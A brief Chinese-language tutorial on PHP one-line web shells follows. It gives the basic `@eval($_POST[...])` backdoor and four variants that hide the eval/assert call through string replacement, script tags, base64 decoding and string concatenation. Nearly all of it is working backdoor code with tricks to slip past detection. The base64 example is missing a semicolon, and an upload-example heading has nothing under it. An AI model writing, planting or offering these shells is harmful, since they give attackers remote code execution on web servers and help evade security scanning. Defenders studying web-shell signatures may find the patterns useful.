一、最基本的一句话
@ 表示忽略报错
$_POST 表示使用post的方式提交变量
attack代表为变量名
<?php @eval($_POST['attack'])?>
上传木马使用实例:
二、一句话变形
1、str_replace函数
查找字符串中的abc,并用空串替换
<?php
$a=str_replace("abc", "", "aabcsabcsabceabcrabcabct");
$a(@$_POST['cmd']);
?>
实际执行的木马为
<?php
assert(@$_POST['cmd']);
?>
2、使用script代替<? 、?>标签
<script language="php">
@eval($_POST['cmd'])
</script>
3、base64加密
ZXZhbA== 实际上是eval的base64编码
<?php
$a=base64_decode("ZXZhbA==")
$a($_POST['cmd']);
?>
4、"."操作符
在php中,"."操作符可以将两个字符连接起来
<?php
$a="e"."v";
$b="a"."l";
$c=$a.$b;
$c($_POST['cmd']);
?>